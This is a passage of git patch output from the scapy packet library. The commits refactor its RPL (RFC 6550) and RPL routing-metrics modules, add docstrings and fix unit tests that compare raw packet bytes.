Object Acknowledgement" - fields_desc = [XShortField("cksum", None), - # Base Object - ByteField("RPLInstanceID", 50), + fields_desc = [ByteField("RPLInstanceID", 50), BitField("D", 0, 1), BitField("flags", 0, 7), ByteField("dcoseq", 1), ByteField("status", 0), _OptDODAGIDField("dodagid", None)] - overload_fields = {RPL: {"code": 8}} # https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes -icmp6rplcodes.update({0: DIS, - 1: DIO, - 2: DAO, - 3: DAOACK, - # 4: "P2P-DRO", - # 5: "P2P-DRO-ACK", - # 6: "Measurement", - 7: DCO, - 8: DCOACK}) +bind_layers(RPL, DIS, code=0) +bind_layers(RPL, DIO, code=1) +bind_layers(RPL, DAO, code=2) +bind_layers(RPL, DAOACK, code=3) +bind_layers(RPL, DCO, code=7) +bind_layers(RPL, DCOACK, code=8) # https://www.iana.org/assignments/rpl/rpl.xhtml#control-message-options -rplopts.update({0: Pad1, - 1: PadN, - # 2: OptDAGMC # Handled in rpl_metrics.py - 3: OptRIO, # Routing Information - 4: OptDODAGConfig, # DODAG Configuration - 5: OptTgt, # RPL Target - 6: OptTIO, # Transit Information - 7: OptSolInfo, # Solicited Information - 8: OptPIO, # Prefix Information Option - 9: OptTgtDesc}) # Target Descriptor +for msg in [DIS, DIO, DAO, DAOACK, DCO, DCOACK]: + bind_layers(msg, Pad1, otype=0) + bind_layers(msg, PadN, otype=1) + # OptDAGMC, otype=2 defined in rpl_metric.py + bind_layers(msg, OptRIO, otype=3) + bind_layers(msg, OptDODAGConfig, otype=4) + bind_layers(msg, OptTgt, otype=5) + bind_layers(msg, OptTIO, otype=6) + bind_layers(msg, OptSolInfo, otype=7) + bind_layers(msg, OptPIO, otype=8) + bind_layers(msg, OptTgtDesc, otype=9) diff --git a/scapy/contrib/rpl_metrics.py b/scapy/contrib/rpl_metrics.py index 287762e870c..978410fa7c0 100644 --- a/scapy/contrib/rpl_metrics.py +++ b/scapy/contrib/rpl_metrics.py @@ -20,13 +20,17 @@ # scapy.contrib.description = Routing Metrics used for Path Calc in LLNs # scapy.contrib.status = loads +""" +RFC 6551 - Routing Metrics Used for Path Calculation in LLNs +""" + import struct from scapy.compat import orb -from scapy.packet import Packet +from scapy.packet import Packet, bind_layers from scapy.fields import ByteEnumField, ByteField, ShortField, BitField, \ BitEnumField, FieldLenField, StrLenField, IntField from scapy.layers.inet6 import _PhantomAutoPadField, _OptionsField -from scapy.contrib.rpl import rploptsstr, rplopts +from scapy.contrib.rpl import rploptsstr, DIS, DIO, DAO, DAOACK, DCO, DCOACK class _DAGMetricContainer(Packet): @@ -41,39 +45,48 @@ def post_build(self, p, pay): return p -_dagmcobjtypes = {1: "Node State and Attributes", - 2: "Node Energy", - 3: "Hop Count", - 4: "Link Throughput", - 5: "Link Latency", - 6: "Link Quality Level", - 7: "Link ETX", - 8: "Link Color"} +DAGMC_OBJTYPE = {1: "Node State and Attributes", + 2: "Node Energy", + 3: "Hop Count", + 4: "Link Throughput", + 5: "Link Latency", + 6: "Link Quality Level", + 7: "Link ETX", + 8: "Link Color"} class DAGMCObjUnknown(Packet): + """ + Dummy unknown metric/constraint + """ name = 'Unknown DAGMC Object Option' - fields_desc = [ByteEnumField("otype", 3, _dagmcobjtypes), + fields_desc = [ByteEnumField("otype", 3, DAGMC_OBJTYPE), FieldLenField("olen", None, length_of="odata", fmt="B"), StrLenField("odata", "", length_from=lambda pkt: pkt.olen)] @classmethod def dispatch_hook(cls, _pkt=None, *_, **kargs): + """ + Dispatch hook for DAGMC sub-fields + """ if _pkt: - o = orb(_pkt[0]) # Option type - if o in dagmcobjcls: - return dagmcobjcls[o] + opt_type = orb(_pkt[0]) # Option type + if opt_type in DAGMC_CLS: + return DAGMC_CLS[opt_type] return cls -aggroutmetric = {0: "additive", - 1: "maximum", - 2: "minimum", - 3: "multiplicative"} # RFC 6551 +AGG_RTMETRIC = {0: "additive", + 1: "maximum", + 2: "minimum", + 3: "multiplicative"} # RFC 6551 class DAGMCObj(Packet): + """ + Set the length field in DAG Metric Constraint Control Option + """ name = 'Dummy DAG MC Object' def post_build(self, p, pay): @@ -86,14 +99,17 @@ def post_build(self, p, pay): class NSA(DAGMCObj): + """ + DAG Metric: Node State and Attributes + """ name = "Node State and Attributes" - fields_desc = [ByteEnumField("otype", 1, _dagmcobjtypes), + fields_desc = [ByteEnumField("otype", 1, DAGMC_OBJTYPE), BitField("resflags", 0, 5), BitField("P", 0, 1), BitField("C", 0, 1), BitField("O", 0, 1), BitField("R", 0, 1), - BitEnumField("A", 0, 3, aggroutmetric), + BitEnumField("A", 0, 3, AGG_RTMETRIC), BitField("prec", 0, 4), ByteField("len", None), # NSA Object Body Format @@ -104,14 +120,17 @@ class NSA(DAGMCObj): class NodeEnergy(DAGMCObj): + """ + DAG Metric: Node Energy + """ name = "Node Energy" - fields_desc = [ByteEnumField("otype", 2, _dagmcobjtypes), + fields_desc = [ByteEnumField("otype", 2, DAGMC_OBJTYPE), BitField("resflags", 0, 5), BitField("P", 0, 1), BitField("C", 0, 1), BitField("O", 0, 1), BitField("R", 0, 1), - BitEnumField("A", 0, 3, aggroutmetric), + BitEnumField("A", 0, 3, AGG_RTMETRIC), BitField("prec", 0, 4), ByteField("len", None), # NE Sub-Object Format @@ -123,14 +142,17 @@ class NodeEnergy(DAGMCObj): class HopCount(DAGMCObj): + """ + DAG Metric: Hop Count + """ name = "Hop Count" - fields_desc = [ByteEnumField("otype", 3, _dagmcobjtypes), + fields_desc = [ByteEnumField("otype", 3, DAGMC_OBJTYPE), BitField("resflags", 0, 5), BitField("P", 0, 1), BitField("C", 0, 1), BitField("O", 0, 1), BitField("R", 0, 1), - BitEnumField("A", 0, 3, aggroutmetric), + BitEnumField("A", 0, 3, AGG_RTMETRIC), BitField("prec", 0, 4), ByteField("len", None), # Sub-Object Format @@ -140,14 +162,17 @@ class HopCount(DAGMCObj): class LinkThroughput(DAGMCObj): + """ + DAG Metric: Link Throughput + """ name = "Link Throughput" - fields_desc = [ByteEnumField("otype", 4, _dagmcobjtypes), + fields_desc = [ByteEnumField("otype", 4, DAGMC_OBJTYPE), BitField("resflags", 0, 5), BitField("P", 0, 1), BitField("C", 0, 1), BitField("O", 0, 1), BitField("R", 0, 1), - BitEnumField("A", 0, 3, aggroutmetric), + BitEnumField("A", 0, 3, AGG_RTMETRIC), BitField("prec", 0, 4), ByteField("len", None), # Sub-Object Format @@ -155,14 +180,17 @@ class LinkThroughput(DAGMCObj): class LinkLatency(DAGMCObj): + """ + DAG Metric: Link Latency + """ name = "Link Latency" - fields_desc = [ByteEnumField("otype", 5, _dagmcobjtypes), + fields_desc = [ByteEnumField("otype", 5, DAGMC_OBJTYPE), BitField("resflags", 0, 5), BitField("P", 0, 1), BitField("C", 0, 1), BitField("O", 0, 1), BitField("R", 0, 1), - BitEnumField("A", 0, 3, aggroutmetric), + BitEnumField("A", 0, 3, AGG_RTMETRIC), BitField("prec", 0, 4), ByteField("len", None), # NE Sub-Object Format @@ -170,14 +198,17 @@ class LinkLatency(DAGMCObj): class LinkQualityLevel(DAGMCObj): + """ + DAG Metric: Link Quality Level (LQL) + """ name = "Link Quality Level" - fields_desc = [ByteEnumField("otype", 6, _dagmcobjtypes), + fields_desc = [ByteEnumField("otype", 6, DAGMC_OBJTYPE), BitField("resflags", 0, 5), BitField("P", 0, 1), BitField("C", 0, 1), BitField("O", 0, 1), BitField("R", 0, 1), - BitEnumField("A", 0, 3, aggroutmetric), + BitEnumField("A", 0, 3, AGG_RTMETRIC), BitField("prec", 0, 4), ByteField("len", None), # Sub-Object Format @@ -187,14 +218,17 @@ class LinkQualityLevel(DAGMCObj): class LinkETX(DAGMCObj): + """ + DAG Metric: Link ETX + """ name = "Link ETX" - fields_desc = [ByteEnumField("otype", 7, _dagmcobjtypes), + fields_desc = [ByteEnumField("otype", 7, DAGMC_OBJTYPE), BitField("resflags", 0, 5), BitField("P", 0, 1), BitField("C", 0, 1), BitField("O", 0, 1), BitField("R", 0, 1), - BitEnumField("A", 0, 3, aggroutmetric), + BitEnumField("A", 0, 3, AGG_RTMETRIC), BitField("prec", 0, 4), ByteField("len", None), # Sub-Object Format @@ -204,14 +238,17 @@ class LinkETX(DAGMCObj): # Note: Wireshark shows warning decoding LinkColor. # This seems to be wireshark issue! class LinkColor(DAGMCObj): + """ + DAG Metric: Link Color + """ name = "Link Color" - fields_desc = [ByteEnumField("otype", 8, _dagmcobjtypes), + fields_desc = [ByteEnumField("otype", 8, DAGMC_OBJTYPE), BitField("resflags", 0, 5), BitField("P", 0, 1), BitField("C", 0, 1), BitField("O", 0, 1), BitField("R", 0, 1), - BitEnumField("A", 0, 3, aggroutmetric), + BitEnumField("A", 0, 3, AGG_RTMETRIC), BitField("prec", 0, 4), ByteField("len", None), # Sub-Object Format @@ -220,17 +257,20 @@ class LinkColor(DAGMCObj): BitField("counter", 1, 6)] -dagmcobjcls = {1: NSA, - 2: NodeEnergy, - 3: HopCount, - 4: LinkThroughput, - 5: LinkLatency, - 6: LinkQualityLevel, - 7: LinkETX, - 8: LinkColor} +DAGMC_CLS = {1: NSA, + 2: NodeEnergy, + 3: HopCount, + 4: LinkThroughput, + 5: LinkLatency, + 6: LinkQualityLevel, + 7: LinkETX, + 8: LinkColor} class OptDAGMC(_DAGMetricContainer): + """ + Control Option: DAG Metric Container + """ name = "DAG Metric Container" fields_desc = [ByteEnumField("otype", 2, rploptsstr), ByteField("len", None), @@ -240,4 +280,5 @@ class OptDAGMC(_DAGMetricContainer): # https://www.iana.org/assignments/rpl/rpl.xhtml#control-message-options -rplopts.update({2: OptDAGMC}) +for msg in [DIS, DIO, DAO, DAOACK, DCO, DCOACK]: + bind_layers(msg, OptDAGMC, otype=2) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 2de8406d1c5..bfdfae14a50 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -2610,35 +2610,23 @@ def _niquery_guesser(p): ############################################################################# ############################################################################# -icmp6rplcodes = { -} # filled in contrib/rpl.py - - -class _RPLGuessPayload: - name = "Dummy RPL class that implements guess_payload_class()" - - def guess_payload_class(self, p): - if len(p) > 1: - return icmp6rplcodes.get(self.code, Raw) - - # https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes rplcodes = {0: "DIS", 1: "DIO", 2: "DAO", 3: "DAO-ACK", - 4: "P2P-DRO", - 5: "P2P-DRO-ACK", - 6: "Measurement", + # 4: "P2P-DRO", + # 5: "P2P-DRO-ACK", + # 6: "Measurement", 7: "DCO", 8: "DCO-ACK"} -class RPL(_RPLGuessPayload, _ICMPv6): # RFC 6550 +class RPL(_ICMPv6): # RFC 6550 name = 'RPL' fields_desc = [ByteEnumField("type", 155, icmp6types), - ByteEnumField("code", 0, rplcodes)] - overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}} + ByteEnumField("code", 0, rplcodes), + XShortField("cksum", None)] ############################################################################# @@ -4007,7 +3995,6 @@ def _load_dict(d): d[k] = _get_cls(v) -_load_dict(icmp6rplcodes) _load_dict(icmp6ndoptscls) _load_dict(icmp6typescls) _load_dict(ipv6nhcls) @@ -4037,3 +4024,4 @@ def _load_dict(d): bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6) bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP) bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE) +bind_layers(IPv6, RPL, {"nh": 58, "dst": "ff02::1a"}) diff --git a/test/contrib/rpl.uts b/test/contrib/rpl.uts index d178b9c5f2b..54a4d77b92e 100644 --- a/test/contrib/rpl.uts +++ b/test/contrib/rpl.uts @@ -13,6 +13,9 @@ assert(raw(RPL()/DAO()) == b'\x9b\x02\x00\x00\x32\x00\x00\x01') assert(raw(RPL()/DAOACK()) == b'\x9b\x03\x00\x00\x32\x00\x01\x00') assert(raw(RPL()/DCO()) == b'\x9b\x07\x00\x00\x32\x00\x00\x01') assert(raw(RPL()/DCOACK()) == b'\x9b\x08\x00\x00\x32\x00\x01\x00') +assert(raw(IPv6()/RPL()/DCOACK()/PadN(optdata='0'*10)) == b'\x60\x00\x00\x00\x00\x14\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x0f\x86\xcc\x88\xaf\xfa\xbe\x25\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x08\xf7\xe0\x32\x00\x01\x00\x01\x0a\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30') +assert(raw(IPv6()/RPL()/DCO()/OptTgt(prefix="fd00::1", plen=128)) == b'\x60\x00\x00\x00\x00\x1c\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x0f\x86\xcc\x88\xaf\xfa\xbe\x25\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x07\xe8\x3f\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') + = RPL Base Objects dissection # Test DIS dissection @@ -44,14 +47,21 @@ assert(raw(RPL()/DIS()/OptSolInfo()) == \ b'\x9b\x00\x00\x00\x00\x00\x07\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00') # DIO with DAG MC option with link ETX metric -assert(raw(RPL()/DIO()/OptDAGMC()/LinkETX())) == \ - b'\x9b\x01\x00\x00\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x07\x00\x00\x02\x00\x01' +assert(raw(RPL()/DIO()/OptDAGMC()/LinkETX()) == \ + b'\x9b\x01\x00\x00\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x07\x00\x00\x02\x00\x01') # Normal DAO message with single target, since transit assert(raw(IPv6(src="fe80::1", dst="fe80::2")/\ RPL()/DAO()/\ OptTgt(plen=128,prefix="fd00::1")/\ - OptTIO())) == \ - b'\x60\x00\x00\x00\x00\x22\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x9b\x02\x2c\x04\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x04\x00\x00\x00\xff' + OptTIO()) == \ + b'\x60\x00\x00\x00\x00\x22\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x9b\x02\x2c\x04\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x04\x00\x00\x00\xff') + +assert(raw(RPL()/DAO(D=1, dodagid="fd00::1")/OptDAGMC()) == \ + b'\x9b\x02\x00\x00\x32\x40\x00\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00') +p=IPv6(b'\x60\x00\x00\x00\x00\x32\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x9b\x02\x12\x08\x32\x40\x00\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x12\x00\x80\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x04\x00\x00\x6f\xff') +assert(p.payload.code == 2) # Its a DAO +p=IPv6(b'\x60\x00\x00\x00\x00\x1c\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x0f\x86\xcc\x88\xaf\xfa\xbe\x25\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x07\xe8\x3f\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +assert(p.payload.code == 7) # Its a DCO From 84f1f0f2731aa2a40384cff125151f3ef29c9641 Mon Sep 17 00:00:00 2001 From: Rahul Jadhav Date: Tue, 2 Jun 2020 18:48:20 +0800 Subject: [PATCH 0187/1632] fixed a variable name change --- scapy/contrib/rpl_metrics.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/rpl_metrics.py b/scapy/contrib/rpl_metrics.py index 978410fa7c0..0fd9a218f35 100644 --- a/scapy/contrib/rpl_metrics.py +++ b/scapy/contrib/rpl_metrics.py @@ -30,7 +30,7 @@ from scapy.fields import ByteEnumField, ByteField, ShortField, BitField, \ BitEnumField, FieldLenField, StrLenField, IntField from scapy.layers.inet6 import _PhantomAutoPadField, _OptionsField -from scapy.contrib.rpl import rploptsstr, DIS, DIO, DAO, DAOACK, DCO, DCOACK +from scapy.contrib.rpl import RPLOPTSSTR, DIS, DIO, DAO, DAOACK, DCO, DCOACK class _DAGMetricContainer(Packet): @@ -272,7 +272,7 @@ class OptDAGMC(_DAGMetricContainer): Control Option: DAG Metric Container """ name = "DAG Metric Container" - fields_desc = [ByteEnumField("otype", 2, rploptsstr), + fields_desc = [ByteEnumField("otype", 2, RPLOPTSSTR), ByteField("len", None), _PhantomAutoPadField("autopad", 0), _OptionsField("options", [], DAGMCObjUnknown, 8, From 4f320b54dc57ee27b88954b9e6b159b963467107 Mon Sep 17 00:00:00 2001 From: Rahul Jadhav Date: Tue, 2 Jun 2020 19:39:57 +0800 Subject: [PATCH 0188/1632] using ConditionalField for dodagid; bind_layer fixes --- scapy/contrib/rpl.py | 81 ++++++++++++++++++------------------ scapy/contrib/rpl_metrics.py | 13 ++++-- scapy/layers/inet6.py | 2 +- 3 files changed, 51 insertions(+), 45 deletions(-) diff --git a/scapy/contrib/rpl.py b/scapy/contrib/rpl.py index efb74847056..76d5272e5f3 100644 --- a/scapy/contrib/rpl.py +++ b/scapy/contrib/rpl.py @@ -23,11 +23,21 @@ """ RFC 6550 - Routing Protocol for Low-Power and Lossy Networks (RPL) draft-ietf-roll-efficient-npdao-17 - Efficient Route Invalidation + ++----------------------------------------------------------------------+ +| RPL Options = Pad1/PadN/TIO/RIO/PIO/Tgt/TgtDesc/DODAGConfig/DAGMC/.. | +|----------------------------------------------------------------------| +| RPL Msgs = DIS/DIO/DAO/DAOACK/DCO/DCOACK | +|----------------------------------------------------------------------| +| ICMPv6 - type 155 = RPL | ++----------------------------------------------------------------------+ + """ from scapy.packet import Packet, bind_layers from scapy.fields import ByteEnumField, ByteField, IP6Field, ShortField, \ - BitField, BitEnumField, FieldLenField, StrLenField, IntField + BitField, BitEnumField, FieldLenField, StrLenField, IntField, \ + ConditionalField from scapy.layers.inet6 import RPL, icmp6ndraprefs, _IP6PrefixField @@ -53,8 +63,12 @@ 10: "P2P Route Discovery"} +class _RPLGuessMsgType(Packet): + name = "Dummy RPL Message class" + + class _RPLGuessOption(Packet): - name = "Dummy RPL Option class that implements guess_payload_class()" + name = "Dummy RPL Option class" class OptRIO(_RPLGuessOption): @@ -189,7 +203,7 @@ class PadN(_RPLGuessOption): # RPL Control Message Handling -class DIS(_RPLGuessOption, Packet): +class DIS(_RPLGuessMsgType, _RPLGuessOption): """ Control Message: DODAG Information Solicitation (DIS) """ @@ -198,7 +212,7 @@ class DIS(_RPLGuessOption, Packet): ByteField("reserved", 0)] -class DIO(_RPLGuessOption, Packet): +class DIO(_RPLGuessMsgType, _RPLGuessOption): """ Control Message: DODAG Information Object (DIO) """ @@ -216,24 +230,7 @@ class DIO(_RPLGuessOption, Packet): IP6Field("dodagid", "::1")] -class _OptDODAGIDField(IP6Field): - """ - Handle Optional DODAG ID field in DAO - """ - def getfield(self, pkt, s): - if pkt.D == 0: - return s, None - return s[16:], self.m2i(pkt, s[:16]) - - def addfield(self, pkt, s, val): - if pkt.D == 1: - return s + self.i2m(pkt, val) - if val: - print("RPL DAO 'D' flag is not set but dodagid is given.") - return s - - -class DAO(_RPLGuessOption, Packet): +class DAO(_RPLGuessMsgType, _RPLGuessOption): """ Control Message: Destination Advertisement Object (DAO) """ @@ -244,10 +241,11 @@ class DAO(_RPLGuessOption, Packet): BitField("flags", 0, 6), ByteField("reserved", 0), ByteField("daoseq", 1), - _OptDODAGIDField("dodagid", None)] + ConditionalField(IP6Field("dodagid", None), + lambda pkt: pkt.D == 1)] -class DAOACK(_RPLGuessOption, Packet): +class DAOACK(_RPLGuessMsgType, _RPLGuessOption): """ Control Message: Destination Advertisement Object Acknowledgement (DAOACK) """ @@ -257,11 +255,12 @@ class DAOACK(_RPLGuessOption, Packet): BitField("reserved", 0, 7), ByteField("daoseq", 1), ByteField("status", 0), - _OptDODAGIDField("dodagid", None)] + ConditionalField(IP6Field("dodagid", None), + lambda pkt: pkt.D == 1)] # https://datatracker.ietf.org/doc/draft-ietf-roll-efficient-npdao/ -class DCO(_RPLGuessOption, Packet): +class DCO(_RPLGuessMsgType, _RPLGuessOption): """ Control Message: Destination Cleanup Object (DCO) """ @@ -272,11 +271,12 @@ class DCO(_RPLGuessOption, Packet): BitField("flags", 0, 6), ByteField("status", 0), ByteField("dcoseq", 1), - _OptDODAGIDField("dodagid", None)] + ConditionalField(IP6Field("dodagid", None), + lambda pkt: pkt.D == 1)] # https://datatracker.ietf.org/doc/draft-ietf-roll-efficient-npdao/ -class DCOACK(_RPLGuessOption, Packet): +class DCOACK(_RPLGuessMsgType, _RPLGuessOption): """ Control Message: Destination Cleanup Object Acknowledgement (DCOACK) """ @@ -286,7 +286,8 @@ class DCOACK(_RPLGuessOption, Packet): BitField("flags", 0, 7), ByteField("dcoseq", 1), ByteField("status", 0), - _OptDODAGIDField("dodagid", None)] + ConditionalField(IP6Field("dodagid", None), + lambda pkt: pkt.D == 1)] # https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes @@ -298,15 +299,13 @@ class DCOACK(_RPLGuessOption, Packet): bind_layers(RPL, DCOACK, code=8) -# https://www.iana.org/assignments/rpl/rpl.xhtml#control-message-options -for msg in [DIS, DIO, DAO, DAOACK, DCO, DCOACK]: - bind_layers(msg, Pad1, otype=0) - bind_layers(msg, PadN, otype=1) - # OptDAGMC, otype=2 defined in rpl_metric.py - bind_layers(msg, OptRIO, otype=3) - bind_layers(msg, OptDODAGConfig, otype=4) - bind_layers(msg, OptTgt, otype=5) - bind_layers(msg, OptTIO, otype=6) - bind_layers(msg, OptSolInfo, otype=7) - bind_layers(msg, OptPIO, otype=8) - bind_layers(msg, OptTgtDesc, otype=9) +bind_layers(_RPLGuessMsgType, Pad1, otype=0) +bind_layers(_RPLGuessMsgType, PadN, otype=1) +# OptDAGMC, otype=2 defined in rpl_metric.py +bind_layers(_RPLGuessMsgType, OptRIO, otype=3) +bind_layers(_RPLGuessMsgType, OptDODAGConfig, otype=4) +bind_layers(_RPLGuessMsgType, OptTgt, otype=5) +bind_layers(_RPLGuessMsgType, OptTIO, otype=6) +bind_layers(_RPLGuessMsgType, OptSolInfo, otype=7) +bind_layers(_RPLGuessMsgType, OptPIO, otype=8) +bind_layers(_RPLGuessMsgType, OptTgtDesc, otype=9) diff --git a/scapy/contrib/rpl_metrics.py b/scapy/contrib/rpl_metrics.py index 0fd9a218f35..3972d27b6bd 100644 --- a/scapy/contrib/rpl_metrics.py +++ b/scapy/contrib/rpl_metrics.py @@ -22,6 +22,14 @@ """ RFC 6551 - Routing Metrics Used for Path Calculation in LLNs + ++----------------------------+ +| Metrics & Constraint Types | ++----------------------------+ +| DAGMC Option | ++----------------------------+ +| RPL-DIO | ++----------------------------+ """ import struct @@ -30,7 +38,7 @@ from scapy.fields import ByteEnumField, ByteField, ShortField, BitField, \ BitEnumField, FieldLenField, StrLenField, IntField from scapy.layers.inet6 import _PhantomAutoPadField, _OptionsField -from scapy.contrib.rpl import RPLOPTSSTR, DIS, DIO, DAO, DAOACK, DCO, DCOACK +from scapy.contrib.rpl import RPLOPTSSTR, _RPLGuessMsgType class _DAGMetricContainer(Packet): @@ -280,5 +288,4 @@ class OptDAGMC(_DAGMetricContainer): # https://www.iana.org/assignments/rpl/rpl.xhtml#control-message-options -for msg in [DIS, DIO, DAO, DAOACK, DCO, DCOACK]: - bind_layers(msg, OptDAGMC, otype=2) +bind_layers(_RPLGuessMsgType, OptDAGMC, otype=2) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index bfdfae14a50..bc18182e716 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -4024,4 +4024,4 @@ def _load_dict(d): bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6) bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP) bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE) -bind_layers(IPv6, RPL, {"nh": 58, "dst": "ff02::1a"}) +bind_layers(IPv6, RPL, nh=58, dst="ff02::1a") From aed1443562bf136a01134880cdc38816645a8b12 Mon Sep 17 00:00:00 2001 From: Rahul Jadhav Date: Tue, 2 Jun 2020 20:39:57 +0800 Subject: [PATCH 0189/1632] tox docs fixes --- scapy/contrib/rpl.py | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/scapy/contrib/rpl.py b/scapy/contrib/rpl.py index 76d5272e5f3..4b9ead5f3e5 100644 --- a/scapy/contrib/rpl.py +++ b/scapy/contrib/rpl.py @@ -21,19 +21,23 @@ # scapy.contrib.status = loads """ +RPL +=== + RFC 6550 - Routing Protocol for Low-Power and Lossy Networks (RPL) draft-ietf-roll-efficient-npdao-17 - Efficient Route Invalidation +----------------------------------------------------------------------+ -| RPL Options = Pad1/PadN/TIO/RIO/PIO/Tgt/TgtDesc/DODAGConfig/DAGMC/.. | -|----------------------------------------------------------------------| -| RPL Msgs = DIS/DIO/DAO/DAOACK/DCO/DCOACK | -|----------------------------------------------------------------------| -| ICMPv6 - type 155 = RPL | +| RPL Options : Pad1 PadN TIO RIO PIO Tgt TgtDesc DODAGConfig DAGMC ...| ++----------------------------------------------------------------------+ +| RPL Msgs : DIS DIO DAO DAOACK DCO DCOACK | ++----------------------------------------------------------------------+ +| ICMPv6 : type 155 RPL | +----------------------------------------------------------------------+ """ + from scapy.packet import Packet, bind_layers from scapy.fields import ByteEnumField, ByteField, IP6Field, ShortField, \ BitField, BitEnumField, FieldLenField, StrLenField, IntField, \ From c4b80cc76eafea9cc5fd4e3f8a3c8c66a654effe Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 2 Jun 2020 15:04:40 +0200 Subject: [PATCH 0190/1632] codecov configuration file moved to .github/ (#2519) * codecov configuration file moved to .github/ --- .codecov.yml => .github/codecov.yml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename .codecov.yml => .github/codecov.yml (100%) diff --git a/.codecov.yml b/.github/codecov.yml similarity index 100% rename from .codecov.yml rename to .github/codecov.yml From 166b18c122ee352e93e8fe44e44d635cc0972bdd Mon Sep 17 00:00:00 2001 From: Rahul Jadhav Date: Tue, 2 Jun 2020 21:09:53 +0800 Subject: [PATCH 0191/1632] unittest fix: used link local ipv6 address which is diff on CI machine --- test/contrib/rpl.uts | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/test/contrib/rpl.uts b/test/contrib/rpl.uts index 54a4d77b92e..60c8e0151c2 100644 --- a/test/contrib/rpl.uts +++ b/test/contrib/rpl.uts @@ -13,8 +13,11 @@ assert(raw(RPL()/DAO()) == b'\x9b\x02\x00\x00\x32\x00\x00\x01') assert(raw(RPL()/DAOACK()) == b'\x9b\x03\x00\x00\x32\x00\x01\x00') assert(raw(RPL()/DCO()) == b'\x9b\x07\x00\x00\x32\x00\x00\x01') assert(raw(RPL()/DCOACK()) == b'\x9b\x08\x00\x00\x32\x00\x01\x00') -assert(raw(IPv6()/RPL()/DCOACK()/PadN(optdata='0'*10)) == b'\x60\x00\x00\x00\x00\x14\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x0f\x86\xcc\x88\xaf\xfa\xbe\x25\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x08\xf7\xe0\x32\x00\x01\x00\x01\x0a\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30') -assert(raw(IPv6()/RPL()/DCO()/OptTgt(prefix="fd00::1", plen=128)) == b'\x60\x00\x00\x00\x00\x1c\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x0f\x86\xcc\x88\xaf\xfa\xbe\x25\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x07\xe8\x3f\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +p=raw(IPv6(src="fe80::1")/RPL()/DCOACK()/PadN(optdata='0'*10)) +assert(p == b'\x60\x00\x00\x00\x00\x14\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x08\x42\x0f\x32\x00\x01\x00\x01\x0a\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30') + +p = 